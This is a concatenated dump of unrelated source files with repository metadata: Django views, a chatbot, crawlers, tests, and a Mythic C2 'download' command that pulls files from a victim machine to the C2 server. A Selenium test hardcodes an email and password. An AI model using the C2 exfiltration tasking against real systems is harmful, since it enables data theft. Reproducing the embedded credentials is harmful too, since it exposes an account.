stock_num = average * 1.1
new_stock_data.append(round(stock_num))
return new_stock_data
def main():
"""
Run all program functions
"""
data = get_sales_data()
sales_data = [int(num) for num in data]
update_worksheet(sales_data, "sales")
new_surplus_data = calculate_surplus_data(sales_data)
update_worksheet(new_surplus_data, "surplus")
sales_columns = get_last_5_entries_sales()
stock_data = calculate_stock_data(sales_columns)
update_worksheet(stock_data, "stock")
print("Welcome to Love Sandwiches Data Automation")
main()
| [
"hs@heysonseverino.com"
] | hs@heysonseverino.com |
e894a478cf49f5d808333ba19573bf3ba9434e8e | 13f5984be7be77852e4de29ab98d5494a7fc6767 | /Exam/商汤/环形赛道小游戏.py | cfeda51c8d56cb04a31ed5a4d36ff1e03e2acc17 | [] | no_license | YuanXianguo/Python-Interview-Master | 4252514763fc3f563d9b94e751aa873de1719f91 | 2f73786e8c51dbd248341559de171e18f67f9bf2 | refs/heads/master | 2020-11-26T18:14:50.190812 | 2019-12-20T02:18:03 | 2019-12-20T02:18:03 | 229,169,825 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | def get_sum(nums):
n = len(nums)
nums.extend(nums)
dp = [nums[0]] * len(nums)
for i in range(2 * n):
dp[i] = max(dp[i]+nums[i], nums[i])
return dp[-1]
n = int(input())
nums = list(map(int, input().split()))
print(get_sum(nums))
| [
"736913978@qq.com"
] | 736913978@qq.com |
33c59ff458b9621c26ce34bb6799cfbf035a6441 | 44ed35bf40532a669a40fbcab04f35e0c62b4c09 | /selenium_test_login.py | 849900c7e410733921a19a7c1717403d6aec1bd3 | [] | no_license | bekimdisha/test_repo | 2a54abdbc5ddcc00e9e97ffff268eb16225a1a4b | c1b9b67f0366854363c434e835004fd44528dd39 | refs/heads/master | 2021-01-01T16:41:40.609964 | 2017-07-21T01:46:25 | 2017-07-21T01:46:25 | 97,890,958 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,738 | py | import unittest
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
import time
import setup_logger
class TestSignUpAndLogIn(unittest.TestCase):
def setUp(self):
self.logger_inst = setup_logger.SetupLogger()
self.logger = self.logger_inst.setup_logger()
# create a new Firefox session
self.logger.info("Test Suite Setup started!")
self.driver = webdriver.Chrome()
# navigate to the application home page
self.driver.get("http://www.weebly.com/")
def test_login(self):
self.logger.info("test_login started!")
login_url = self.driver.get("http://www.weebly.com#login")
username = self.driver.find_element_by_id("weebly-username")
self.logger.info('attempting to login with username bekimdisha@gmail.com')
set_un = username.send_keys("bekimdisha@gmail.com")
time.sleep(1)
password = self.driver.find_element_by_id("weebly-password")
self.logger.info('attempting to login with password !bekim123!')
set_pass = password.send_keys("!bekim123!")
time.sleep(1)
login_button = self.driver.find_element_by_class_name("login-btn")
click_login_btn = self.driver.find_element_by_class_name("login-btn").click()
time.sleep(1)
try:
assert 'Weebly - Getting Started' in str(self.driver.title)
except Exception as e:
self.logger.warn('test_login FAILED', format(e))
self.logger.info("test_login ended!")
def tearDown(self):
self.logger.info("Test Suite finished. Tearning down setup!")
self.driver.close()
if __name__ == '__main__':
unittest.main()
| [
"bekimdisha@gmail.com"
] | bekimdisha@gmail.com |
54a92741481e50fdde73c533ad52c1b313d363a4 | cb3bce599e657188c30366adb0af3007ff9b8f96 | /src/note/test_proxy.py | bd9bcba2da944244a78ca5f41ac1a3c0cc431346 | [] | no_license | skk4/python_study | 534339e6c378d686c29af6d81429c472fca19d6d | 4bdd2a50f4bdfd28fdb89a881cb2ebb9eac26987 | refs/heads/master | 2021-01-01T04:36:52.037184 | 2017-12-08T01:04:27 | 2017-12-08T01:04:27 | 97,207,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 574 | py | # -*- coding:utf-8 -*-
#import socket
import random
import urllib2
iplist = ['111.13.7.42:81']
url = 'http://www.whatismyip.com.tw/'
proxy = {'http': random.choice(iplist)}
proxy_support = urllib2.ProxyHandler(proxy)
opener = urllib2.build_opener(proxy_support)
opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36')]
urllib2.install_opener(opener)
rq = urllib2.Request(url)
print rq.get_full_url()
fd = urllib2.urlopen(rq)
print fd.read()
fd.close()
| [
"skk_4@163.com"
] | skk_4@163.com |
f4daad4a47c0fe44e54043eb0a30c4037fdaa0a7 | 901ce889543bce32bcac7bc048a0e0b39144a6de | /chatapp.py | 84be242854825f0fe10a3f4c561f29e1679db036 | [] | no_license | SiDdHaRtHrAjDaSh/hci-review3 | 6052297f70f6784664eb49e5cdeb9c9c2aac6b22 | 7efd80af199391894086a7b4fa7f4d75b60638c5 | refs/heads/main | 2023-01-04T01:11:11.668410 | 2020-11-02T13:31:25 | 2020-11-02T13:31:25 | 309,364,439 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,300 | py | # -*- coding: utf-8 -*-
"""
Created on Sun Nov 1 00:35:15 2020
@author: SIDDHARTH RAJ DASH
"""
import nltk
from nltk.stem import WordNetLemmatizer
lemmatizer = WordNetLemmatizer()
import pickle
import numpy as np
from keras.models import load_model
model = load_model('chatbot_model.h5')
import json
import random
intents = json.loads(open('intents.json').read())
words = pickle.load(open('words.pkl','rb'))
classes = pickle.load(open('classes.pkl','rb'))
def clean_up_sentence(sentence):
# tokenize the pattern - split words into array
sentence_words = nltk.word_tokenize(sentence)
# stem each word - create short form for word
sentence_words = [lemmatizer.lemmatize(word.lower()) for word in sentence_words]
return sentence_words
# return bag of words array: 0 or 1 for each word in the bag that exists in the sentence
def bow(sentence, words, show_details=True):
# tokenize the pattern
sentence_words = clean_up_sentence(sentence)
# bag of words - matrix of N words, vocabulary matrix
bag = [0]*len(words)
for s in sentence_words:
for i,w in enumerate(words):
if w == s:
# assign 1 if current word is in the vocabulary position
bag[i] = 1
if show_details:
print ("found in bag: %s" % w)
return(np.array(bag))
def predict_class(sentence, model):
# filter out predictions below a threshold
p = bow(sentence, words,show_details=False)
res = model.predict(np.array([p]))[0]
ERROR_THRESHOLD = 0.25
results = [[i,r] for i,r in enumerate(res) if r>ERROR_THRESHOLD]
# sort by strength of probability
results.sort(key=lambda x: x[1], reverse=True)
return_list = []
for r in results:
return_list.append({"intent": classes[r[0]], "probability": str(r[1])})
return return_list
def getResponse(ints, intents_json):
tag = ints[0]['intent']
list_of_intents = intents_json['intents']
for i in list_of_intents:
if(i['tag']== tag):
result = random.choice(i['responses'])
break
return result
def chatbot_response(text):
ints = predict_class(text, model)
res = getResponse(ints, intents)
return res | [
"noreply@github.com"
] | noreply@github.com |
d5cd66d641368250a2240e0b25b8c1617d333706 | 38d84678e520e80dc8251b6458ff832549e529b3 | /Sources/VAH/Time_calculator.py | 7ea7d7ebf6859d4a8557c58f002c20cb3cc986ca | [] | no_license | MickaelCalatr/VAH_Solution | bc544a7bed688cffa039c5c83e52ff82af0ba992 | 04fc09526a497766e4d393219bee8c1e8199ce59 | refs/heads/master | 2021-09-25T12:38:16.238310 | 2018-07-13T12:07:55 | 2018-07-13T12:07:55 | 124,483,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,075 | py | import time
import datetime
class Timer:
def __init__(self):
self.time_to_update = 5
self.fps = 0
self.old_frames = 0
self.start = time.time()
self.end = time.time()
self.update_f = time.time()
self.need_print = time.time()
def need_to_print(self):
update = self.end - self.need_print
if update > self.time_to_update:
self.need_print = self.end
return True
return False
def update(self):
self.end = time.time()
def timer(self, frames):
timer = int(self.end - self.start)
update = self.end - self.update_f
if update > 1:
self.fps = int((frames - self.old_frames) / update)
self.old_frames = frames
self.update_f = self.end
return str("Time: " + time.strftime("%H:%M:%S", time.gmtime(timer)) + " \t Fps: " + str(self.fps))
def get_times(self):
self.update()
timer = int(self.end - self.start)
return time.strftime("%H:%M:%S", time.gmtime(timer))
| [
"mickael.calatraba@epitech.eu"
] | mickael.calatraba@epitech.eu |
be490d67d8abd9e56665d7b6ef9536c0352d1325 | fd62d8096dc95923341cfac29f0209bfbea887b4 | /models_evaluation/xgboost/grid_search/jobs_test/5.0_0.03_0.0_200.0_10.0.job.py | 9abbc493eabf624713f7efad4e08eff3f17a4fed | [] | no_license | Eulerianial/premise-selection-deepmath-style | 06c8f2f540bc7e3840c6db0a66c5b30b5f4257f9 | 8684a59b5d8beab1d02a3a7c568a16c790ea4b45 | refs/heads/master | 2021-07-17T17:04:13.472687 | 2017-10-25T13:54:44 | 2017-10-25T13:54:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,637 | py | import xgboost as xgb
import argparse
import sys
import os
from saving_loading import *
#####################################
p = {
"max_depth":int(5.0),
"eta":0.03,
"gamma":0.0,
"num_boost_round":int(200.0),
"early_stopping_rounds":int(10.0)
}
#####################################
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Run CV for xgboost with particular combination of parameters')
parser.add_argument("X",
help = "path to CSR matrix with features of pairs (theorem, premise)")
parser.add_argument("y",
help = "path to CSV file with labels reflecting relevances of pairs (theorem, premise)")
parser.add_argument("output_directory",
help = "path to directory where performance of tested model should be saved")
args = parser.parse_args()
y = read_csv(os.path.abspath(args.y), type_of_records = "int")
X = load_obj(os.path.abspath(args.X))
output_directory = os.path.abspath(args.output_directory)
dtrain = xgb.DMatrix(X, label = y)
params = {
"max_depth":p["max_depth"],
"eta":p["eta"],
"gamma":p["gamma"],
"objective":"binary:logistic"
}
x = xgb.cv(
params = params,
dtrain = dtrain,
num_boost_round = p["num_boost_round"],
early_stopping_rounds = p["early_stopping_rounds"],
nfold = 4,
metrics = {"error","auc","logloss"}
)
output_name = os.path.join(output_directory, "_".join(map(str, list(p.values())))+".pkl")
save_obj({"params":p, "stats":x}, output_name)
| [
"bartoszpiotrowski@post.pl"
] | bartoszpiotrowski@post.pl |
901dcc3900ecf9cac23ac0fed23c343981062771 | 9ccc00f0cf01fe9888b8c151da900a5e64043cd9 | /final/views.py | 5a1ab4f8e41f5d1094a0c4ab5cf9a2bf1a805211 | [] | no_license | Frdhsn/feems | f7ebce1faee4bcab4877dca6d6e59529adbe6bf3 | 950ad3ff09ae09f6ad61d5997fa2220f694a0214 | refs/heads/master | 2023-01-21T19:51:11.332192 | 2020-11-29T16:45:22 | 2020-11-29T16:45:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,653 | py | from django.contrib.auth.decorators import login_required
from .filters import StudentFilter
from .decorator import exists_student, unauthorizeduser
from .models import Student, Semister_Fee, Semister
from django.shortcuts import render, redirect
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth import authenticate, login as dj_login, logout
from django.contrib import messages
from .form import StudentForm, SemisterForm, StaffForm, UpdateStudentByTeacher, UpdateStudentByRegister, UpdateStudentPaymentByRegister
from django.shortcuts import get_object_or_404
# Create your views here.
@login_required(login_url='final:signin')
def homepage(request):
return render(request, 'final/homepage.html')
@unauthorizeduser
def signup(request):
if request.method == "POST":
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password1')
messages.info(request, f"{username} signup completed")
user = authenticate(username=username, password=password)
dj_login(request, user)
return redirect("final:homepage")
else:
form = UserCreationForm()
cont = {
'form': form
}
return render(request, 'final/signup.html', cont)
@exists_student
def studentform(request):
if request.method == "POST":
form = StudentForm(request.POST)
if form.is_valid():
form = form.save(commit=False)
form.user = request.user
form.save()
messages.info(
request, f"Your Student Verify form submitted Successfully")
return redirect("final:student_verify")
else:
form = StudentForm()
return render(request, 'final/student_form.html', {"form": form})
def student_verify_alert(request):
student = Student.objects.get(user=request.user)
permission = student.is_student
return render(request, 'final/student_verify.html', {"permission": permission})
def semister_form(request):
if request.method == "POST":
form = SemisterForm(request.POST)
if form.is_valid():
form = form.save(commit=False)
form.student = Student.objects.get(user=request.user)
form.save()
return redirect('final:attendence_verify', semister_no=form.semister)
else:
form = SemisterForm()
cont = {
'form': form
}
return render(request, 'final/semister_form.html', cont)
def attendence_verify(request, semister_no):
student = Student.objects.get(user=request.user)
student_semister = Semister.objects.filter(
student=student, semister=semister_no).first()
student_attendence = student_semister.have_attendence
return render(request, 'final/attendence_verify.html', {"permission": student_attendence})
def payment_form(request):
student = Student.objects.get(user=request.user)
semister = Semister.objects.filter(student=student).last().semister
if request.method == "POST":
admission_fee = request.POST.get("admission_fee")
session_charge = request.POST.get("session_charge")
exam_fee = request.POST.get("exam_fee")
hall_fee = request.POST.get("hall_fee")
library_fee = request.POST.get("library_fee")
transport_fee = request.POST.get("transport_fee")
medical_fee = request.POST.get("medical_fee")
form = Semister_Fee(student=student,
semister=semister,
admission_fee=admission_fee,
session_charge=session_charge,
exam_fee=exam_fee,
hall_fee=hall_fee,
library_fee=library_fee,
transport_fee=transport_fee,
medical_fee=medical_fee)
form.save()
messages.info(request, f"Your Payment Is completed")
return redirect("final:payment_verify")
return render(request, 'final/payment_form.html')
def payment_verify(request):
payment = Semister_Fee.objects.filter(
student=request.user.student_user).last()
permission = payment.is_register_verify
cont = {
'permission': permission
}
return render(request, 'final/payment_verify.html', cont)
def student_semister_fee(request, student_id):
student = Student.objects.get(id=student_id)
student_semister_fee = Semister_Fee.objects.filter(student=student)
cont = {
'student_semister_fee': student_semister_fee
}
return render(request, 'final/student_semister_fee.html', cont)
def staffform(request):
form = StaffForm()
if request.method == 'POST':
form = StaffForm(request.POST)
if form.is_valid():
dept = form.cleaned_data.get("department")
role = form.cleaned_data.get("Role")
print(role)
if role == "Teacher":
return redirect('final:teacher_students', dept=dept)
else:
return redirect('final:register_students')
return render(request, 'final/staff_form.html', {'form': form})
def teacher_students(request, dept):
students = Student.objects.filter(dept=dept)
myfilter = StudentFilter(request.GET, students)
students = myfilter.qs
cont = {
'students': students,
'myfilter': myfilter
}
return render(request, 'final/teacher_student.html', cont)
def register_students(request):
students = Student.objects.all()
myfilter = StudentFilter(request.GET, students)
students = myfilter.qs
cont = {
'students': students,
'myfilter': myfilter
}
return render(request, 'final/register_students.html', cont)
def update_student_by_teacher(request, semister_no, student_id):
student = Student.objects.get(id=student_id)
semister_for_student = Semister.objects.filter(
student=student, semister=semister_no).first()
if request.method == "POST":
form = UpdateStudentByTeacher(
request.POST, instance=semister_for_student)
if form.is_valid():
form.save()
messages.info(request, f"Student Info Updated")
return redirect('final:teacher_students', student.dept)
else:
form = UpdateStudentByTeacher(instance=semister_for_student)
cont = {
'form': form
}
return render(request, 'final/update_student_by_teacher.html', cont)
def update_student_by_register(request, student_id):
student = Student.objects.get(pk=student_id)
if request.method == "POST":
form = UpdateStudentByRegister(request.POST, instance=student)
if form.is_valid():
form.save()
messages.info(
request, f"The student's identity is validate by Register office!")
return redirect('final:register_students')
else:
form = UpdateStudentByRegister(instance=student)
return render(request, 'final/update_student_by_register.html', {"form": form})
def update_student_payment_by_register(request, student_id, semister_id):
student = Student.objects.get(pk=student_id)
semister_fee = Semister_Fee.objects.filter(
student=student, semister=semister_id).first()
if request.method == "POST":
form = UpdateStudentPaymentByRegister(
request.POST, instance=semister_fee)
if form.is_valid():
form.save()
messages.info(
request, f"The student's payment update completed by Register office!")
return redirect('final:student_semister_fee', student_id)
else:
form = UpdateStudentPaymentByRegister(instance=semister_fee)
return render(request, 'final/update_student_payment_by_register.html', {"form": form})
def profile_page(request):
student = Student.objects.filter(user=request.user)
student_fee = []
if student:
student_fee = Semister_Fee.objects.filter(student=student[0])
cont = {
'student_fee': student_fee
}
return render(request, 'final/profile_page.html', cont)
def preview_fee(request, student_id, semister_num):
student = Student.objects.get(pk=student_id)
student_fee = Semister_Fee.objects.filter(
student=student, semister=semister_num)
print(student_fee)
cont = {
'student_fee': student_fee,
'student_id': student_id
}
return render(request, 'final/preview_fee.html', cont)
| [
"ashikex49@gmail.com"
] | ashikex49@gmail.com |
664776c6b1ed20de8546b76616085ccde59c6ff5 | 0abef26a612ddfad627000e3280f310a978e8d04 | /node-ffi demo/build/config.gypi | 9157e1b1abfc0ed473fc84e6a81b2e523950b219 | [] | no_license | AugustRush/2017demo | 98fef3954c325029e65ac48fd29f778869a62af6 | 79070ea13fd9813fb0904511ef89c8f01ff86ef6 | refs/heads/master | 2021-01-20T12:51:52.335872 | 2017-09-21T06:59:58 | 2017-09-21T06:59:58 | 101,727,546 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,968 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt58l.dat",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt58l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "58",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 48,
"node_no_browser_globals": "false",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "48.dylib",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_inspector": "true",
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/baidu/.node-gyp/6.11.1",
"standalone_static_library": 1
}
}
| [
"liupingwei30@gmail.com"
] | liupingwei30@gmail.com |
852f5bf1d22e53bc8195742775a96253742e89ed | 428b0c174d532f362af755164c01d517c5d28eff | /backend/manage.py | 8b76f37a158a57a733ccc8d742f26e9451df73f1 | [] | no_license | crowdbotics-apps/envy-budget-4817 | e861af5ce1631efffd15ee56fcedc7554427976f | 6e4eab96e9786db16e403844be0e22c92f085a62 | refs/heads/master | 2023-01-05T01:03:04.949154 | 2019-06-18T03:33:41 | 2019-06-18T03:33:41 | 192,458,782 | 0 | 0 | null | 2022-12-30T10:31:26 | 2019-06-18T03:30:29 | Python | UTF-8 | Python | false | false | 636 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'envy_budget_4817.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
276afbc6983319b0eda3c7d14b946c896e905bd4 | cdc76a728f157b3719c3e06eeb1dc8a1ff87556b | /gatePassApp/admin.py | 6e0a3fdc198bc3e6948f1fa19cbf2dc002a524af | [] | no_license | shubhamk-code/gate-pass | d9cdd8b23edec01374c5d8ae2144ee7701db9d73 | f8c1699fb4c3ce810353d15b5920d98e3ac589cc | refs/heads/main | 2023-07-28T08:02:13.999919 | 2021-09-13T16:21:52 | 2021-09-13T16:21:52 | 406,041,078 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,404 | py | from django.contrib import admin
from .models import *
# Register your models here.
# admin.site.register(Admin)
# admin.site.register(Visitor)
# admin.site.register(DepartmentStaff)
# admin.site.register(Staff)
admin.site.register(Department)
# admin.site.register(Pass)
# admin.site.register(Venue)
# admin.site.register(Event)
# admin.site.register(Contractor)
@admin.register(Venue)
class VenueAdmin(admin.ModelAdmin):
list_display = ('name', 'phone', 'address')
ordering = ('name',)
search_fields = ('name', 'address')
@admin.register(Event)
class EventData(admin.ModelAdmin):
list_display = ('name', 'event_date', 'manager', )
ordering = ('name',)
search_fields = ('name', 'manager')
@admin.register(Contractor)
class ContractorData(admin.ModelAdmin):
list_display = ('name', 'email', 'contact', 'company', 'contractual')
ordering = ('name',)
search_fields = ('name', 'company')
@admin.register(Staff)
class StaffData(admin.ModelAdmin):
list_display = ( 'name', 'email', 'contact', 'age', 'gender', 'department')
ordering = ('name',)
search_fields = ('name', 'department', 'contact')
@admin.register(Visitor)
class VisitorData(admin.ModelAdmin):
list_display = ( 'name', 'email', 'contact',
'age', 'gender', 'department', 'status')
ordering = ('name',)
search_fields = ('name', 'contact', 'status', 'gender')
| [
"shbhmkawthekar@gmail.com"
] | shbhmkawthekar@gmail.com |
379ca12fa2e8516b086afc15db4f34106d160071 | 2c8f76ee2579a068cb471cf32447f0fa334b84d8 | /Files and Exceptions/Exercises/Silent_Cats_and_Dogs.py | 9b1fc7a6592c4d066d4c218eb3dc8a9b19ba6d51 | [] | no_license | Ahsank01/Python-Crash-Course | 03386b4273aa66a655cc0f5f31b1994bd461f46b | 1ce40c51cf2c6dc96cecb309e23b948873edb4b4 | refs/heads/master | 2023-01-08T02:26:36.017259 | 2020-11-04T18:02:09 | 2020-11-04T18:02:09 | 295,860,595 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | # Name: Ahsan Khan
# Date: 11/02/20
# Description: Modify the except block from Cats_and_Dogs.py to fail silently if eithrt file is missing
def readFiles(filename):
try:
with open(filename) as f:
contents = f.read()
except FileNotFoundError:
pass
else:
print(contents)
filename = ['cats.txt', 'dogs.txt', 'elephant.txt']
for files in filename:
readFiles(files)
print() | [
"noreply@github.com"
] | noreply@github.com |
6f24935a86a3a6d703e5fa10ad21e8541f62a478 | 0dc9c24f70a0e7649c9936b49466c69a7ae9e1d4 | /InstagramImage.py | 914ad7890e6dbca6fcb9b4bf96bd2991e06e9d95 | [] | no_license | Code-0x00/webImagesCrawler | 1d16183f910f10a11ca67f3b199448f4db65ecb3 | 239d8cb20648ec5e4a9b8941898a59b8f04a9516 | refs/heads/master | 2021-05-10T11:43:12.382798 | 2018-01-29T02:06:12 | 2018-01-29T02:06:12 | 118,418,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,280 | py | #coding:utf-8
import urllib2
import re
from selenium import webdriver
import time
import SqlDB
class InstagramImage:
def __str__(self):
return 'InstagramImage'
__repr__ = __str__
def __init__(self, mSqlDB = 0, mProxy = None):
print 'InstagramImage----in----'
self.mSqlDB = mSqlDB
self.isUsingSqlDB = False
self.mProxy = mProxy
if type(mSqlDB.__class__) is type(SqlDB.SqlDB):
self.isUsingSqlDB = True
print 'using sqlDB'
else:
print 'can not use sqlDB'
#print 'the type of mSqlDB:' + str(mSqlDB.__class__)
print 'InstagramImage----out----'
def insertDB(self, url, keywords):
print 'InstagramImage----insertDB----in----'
if self.isUsingSqlDB:
print 'using sqlDB'
#print 'engine:' + self.__str__()
self.mSqlDB.insert(url, self.__str__(), keywords)
else:
print 'can not use sqlDB'
print 'InstagramImage----insertDB----out----'
def fetch(self, keywords):
print 'InstagramImage----fetch----in----'
driver = webdriver.Firefox(proxy=self.mProxy)
max_id = '0'
for page_num in range(100):
Page_num = page_num
if max_id == '0':
searchUrl = 'https://www.instagram.com/explore/tags/' + keywords
else:
searchUrl = 'https://www.instagram.com/explore/tags/' + keywords + '?max_id='+str(max_id)
print searchUrl
driver.get(searchUrl)
driver.implicitly_wait(5)
content=driver.page_source.encode("utf-8")
urls=re.findall('"id":"[^"]*","display_src":"[^"]*"',content,re.I)
count = 0
for i in urls:
display_id = re.findall('"id":"[^"]*"', i, re.I)[0]
display_src = re.findall('"display_src":"[^"]*"', i, re.I)[0]
real_id = re.findall('"[^"]*"$',display_id,re.I)[0].split('"')[1].strip()
real_src = re.findall('"[^"]*"$',display_src,re.I)[0].split('"')[1].strip()
url = real_src.replace('\\', '')
print url
count = count + 1
#print "count=" + str(count)
self.insertDB(url, unicode(keywords, "utf-8"))
if count == 12:
max_id = real_id
print
break
driver.close()
print 'InstagramImage----fetch----out----'
if __name__=="__main__":
print 'InstagramImage----main----in----'
instagramImage = InstagramImage()
instagramImage.fetch('Abyssinian')
print 'InstagramImage----main----out----'
| [
"yohoho233@gmail.com"
] | yohoho233@gmail.com |
ef9173cfa8a6c3ee550b53d9ab4739412550077e | 567b880347a4ace3a64060753bf9bfadb42fb242 | /demo/app.py | e158c660ac3904f01488022ac78189149d5840be | [] | no_license | land-pack/intuition | 7b8335a8c0a07975c862d8e0daaa1f814bd9f63b | bc0a4e847ebe2b4c80c18d6a7e6e16a828c2a712 | refs/heads/master | 2020-03-23T07:03:36.530012 | 2018-07-18T06:26:09 | 2018-07-18T06:26:09 | 141,245,462 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | import requests
from flask import Flask, render_template
app = Flask(__name__)
@app.route("/")
def index():
r = requests.get('http://127.0.0.1:5001/api/preview')
data = r.json()
images = data.get('images')
return render_template('index.html', images=images)
@app.route("/upload")
def upload():
return render_template('upload.html')
if __name__ == '__main__':
app.run(debug=True)
| [
"landpack@sina.com"
] | landpack@sina.com |
5a37f7eb85b6bd929fabe005a19a2a43d41f15d5 | da5bc6efaebc9ff015938d207b25c7804bc03b33 | /11_class/quiz03/quiz03.py | 58c5273addfe4332aba0c15c597067916327331e | [] | no_license | codud0954/megait_python_20201116 | b0f68f50a1e0d41c3c35535e718d5a236a7b1a98 | a71f57d4332027406953599612cd014de2d26713 | refs/heads/master | 2023-01-31T11:14:27.611468 | 2020-12-18T09:03:11 | 2020-12-18T09:03:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,127 | py | # 제품관리 설계도
class Product:
# 생성자
def __init__(self, name, price, expired_date):
self.name = name
self.price = price
self.expired_date = expired_date
# 제품 정보
def product_info(self):
print("이름:", self.name)
print("가격:", self.price)
print("유통기한", self.expired_date)
# 제품 n개의 가격
def price_of_product(self, count):
return count * self.price
# 판매 가능 여부
def sale_status(self):
# 오늘 날짜 <= 유통기한 날짜 : 판매 가능 상품
# 오늘 날짜 > 유통기한 날짜 : 판매 불가 상품
today = "2020-12-14"
if today <= self.expired_date:
return "판매 가능 상품"
else:
return "판매 불가 상품"
# 객체 생성
shrimp = Product("새우깡", 1300, "2021-03-01")
shrimp.product_info()
print()
print("제품 5개의 가격 : %d" % shrimp.price_of_product(5))
print("제품 13개의 가격 : %d" % shrimp.price_of_product(13))
print(shrimp.sale_status())
| [
"noreply@github.com"
] | noreply@github.com |
fc07856387a10a3a8dbed500fe7a51d73eaeb050 | e59273ecf45ddc40af8f51607e3ca1fb46632bb1 | /Payload_Types/apfell/mythic/agent_functions/download.py | fcfff9bf3b21b6ee4794053ec13673c5fa3ac9f6 | [
"BSD-3-Clause",
"MIT"
] | permissive | thiagomayllart/Mythic | 62ae01a42027ac1a71564775c8cc7ac8d0e88aa4 | bb1a90fb3c3e37c284fc812548b8f7ae5ffc1fb1 | refs/heads/master | 2023-06-02T08:12:09.099400 | 2021-06-19T23:30:26 | 2021-06-19T23:30:26 | 326,127,766 | 0 | 1 | NOASSERTION | 2021-06-20T03:20:21 | 2021-01-02T06:59:04 | Python | UTF-8 | Python | false | false | 1,829 | py | from CommandBase import *
import json
from MythicResponseRPC import *
class DownloadArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {}
async def parse_arguments(self):
if len(self.command_line) > 0:
if self.command_line[0] == "{":
temp_json = json.loads(self.command_line)
if "host" in temp_json:
# this means we have tasking from the file browser rather than the popup UI
# the apfell agent doesn't currently have the ability to do _remote_ listings, so we ignore it
self.command_line = temp_json["path"] + "/" + temp_json["file"]
else:
raise Exception("Unsupported JSON")
class DownloadCommand(CommandBase):
cmd = "download"
needs_admin = False
help_cmd = "download {path to remote file}"
description = "Download a file from the victim machine to the Mythic server in chunks (no need for quotes in the path)."
version = 1
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = True
is_remove_file = False
is_upload_file = False
author = "@its_a_feature_"
parameters = []
attackmapping = ["T1020", "T1030", "T1041"]
argument_class = DownloadArguments
browser_script = BrowserScript(script_name="download", author="@its_a_feature_")
async def create_tasking(self, task: MythicTask) -> MythicTask:
resp = await MythicResponseRPC(task).register_artifact(
artifact_instance="$.NSFileHandle.fileHandleForReadingAtPath, readDataOfLength",
artifact_type="API Called",
)
return task
async def process_response(self, response: AgentResponse):
pass
| [
"codybthomas@gmail.com"
] | codybthomas@gmail.com |
e7c91c20ea5c73db595cd634da092ff3cd4b3fde | 4fa80f69e64d2ed2285b10e47125bcf78487e75e | /w3/testEngine.py | c2bba189fb8263a9de751fa44e23b75a40a70dd8 | [] | no_license | wli21/found18 | 89edd70c8b9e1aff9801d674b96710130dc70ee8 | 397f5dccf9d76e9801a9354f586b1468617f6208 | refs/heads/master | 2020-03-26T17:17:29.432000 | 2018-12-09T21:14:48 | 2018-12-09T21:14:48 | 145,153,376 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 484 | py |
import re,traceback
class O:
y=n=0
@staticmethod
def report():
print("\n# pass= %s fail= %s %%pass = %s%%" % (
O.y,O.n, int(round(O.y*100/(O.y+O.n+0.001)))))
@staticmethod
def k(f):
try:
print("\n-----| %s |-----------------------" % f.__name__)
if f.__doc__:
print("# "+ re.sub(r'\n[ \t]*',"\n# ",f.__doc__))
f()
print("# pass")
O.y += 1
except:
O.n += 1
